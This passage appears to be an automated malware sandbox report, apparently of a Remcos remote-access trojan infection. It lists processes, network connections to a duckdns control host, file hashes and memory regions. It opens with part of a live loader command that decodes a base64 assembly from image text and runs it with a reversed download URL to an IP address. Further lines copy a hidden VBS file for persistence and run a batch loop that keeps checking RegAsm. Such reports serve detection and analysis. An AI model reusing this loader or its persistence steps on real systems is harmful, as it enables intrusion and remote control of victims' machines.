$base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pnuR/HS/zraM/geR/kaT/961.332.202.19//:ptth', '2', 'wertydtfyfFYGVvuyBIH', 'RegAsm', '1'))}}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\ProgramData\wertydtfyfFYGVvuyBIH.vbs'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\write.bat" "
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\tasklist.exe
tasklist /fi "ImageName eq RegAsm.exe" /fo csv
C:\Windows\system32\find.exe
find /I "RegAsm.exe"
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\tasklist.exe
tasklist /fi "ImageName eq RegAsm.exe" /fo csv
C:\Windows\system32\find.exe
find /I "RegAsm.exe"
C:\Windows\system32\timeout.exe
timeout 60
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.226.161:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.226.217.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| TM | 91.202.233.169:80 | 91.202.233.169 | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.233.202.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runp.duckdns.org | udp |
| US | 89.117.23.25:57840 | runp.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 25.23.117.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/4244-0-0x00007FF9FBA03000-0x00007FF9FBA05000-memory.dmp
memory/4244-1-0x0000021BF28B0000-0x0000021BF28D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ed0k3dgn.fq0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4244-11-0x00007FF9FBA00000-0x00007FF9FC4C1000-memory.dmp
memory/4244-12-0x00007FF9FBA00000-0x00007FF9FC4C1000-memory.dmp
memory/4200-22-0x000001E260050000-0x000001E26008E000-memory.dmp
memory/3128-35-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-39-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-41-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-42-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-45-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7f6b840a2ea930a42b14ed71ad6849c5 |
| SHA1 | a61bea32b13b67dd2868d285ad2fd058fca3c43e |
| SHA256 | 9ecf63e750463498ffb46bdcfd64a4ed0bae0ef80c5b43f438211f06b40a145d |
| SHA512 | 37fefc17e40bca636608acc6ddbf47c3a3e87b87267c892ada02101484b8dd82b53ec91e12c583aa10beb5812d7536cbee38faf465594461722896960d182448 |
C:\Users\Admin\AppData\Local\Temp\write.bat
| MD5 | c1949e37bb56f7775023bff66dae0a76 |
| SHA1 | 3afea2a289dec78cac3798516ce1cb2d0841743a |
| SHA256 | 0023f59bc2fc15c28276d0a21f338f6890521e512ea280b00d99b6e6e51db38c |
| SHA512 | cdef0585e8b2ba6c01ee56739274fb544eaf938ed1ed3b427c1e35d7e81061dbd5e1a98c792eb9a11f44e144b30498f23b1ec5d32349987704810537950f0918 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
memory/4244-52-0x00007FF9FBA00000-0x00007FF9FC4C1000-memory.dmp
memory/3128-53-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-54-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-55-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-56-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-61-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-62-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | d71ed9cb8ffd2044a5c8d7808a49a464 |
| SHA1 | 4f8ce7f8d8f674b7bd8a1797c7060f171b28bdf4 |
| SHA256 | a1ab274025f2b464f0659f15530ec9fcdcf7dec2f5c8ac2b0258a8a273f64f35 |
| SHA512 | a0d93dcdd4f4f9b748d6e4ec9316db3b7f7bd2a16879fa4386ad8b48ad5341f750217a8838dd4f510ee88c2cd4c33a3fd6b64b1bd3eeee44ff6846fc00f4d616 |
memory/3128-69-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-70-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-78-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-77-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3128-94-0x0000000000400000-0x0000000000482000-memory.dmp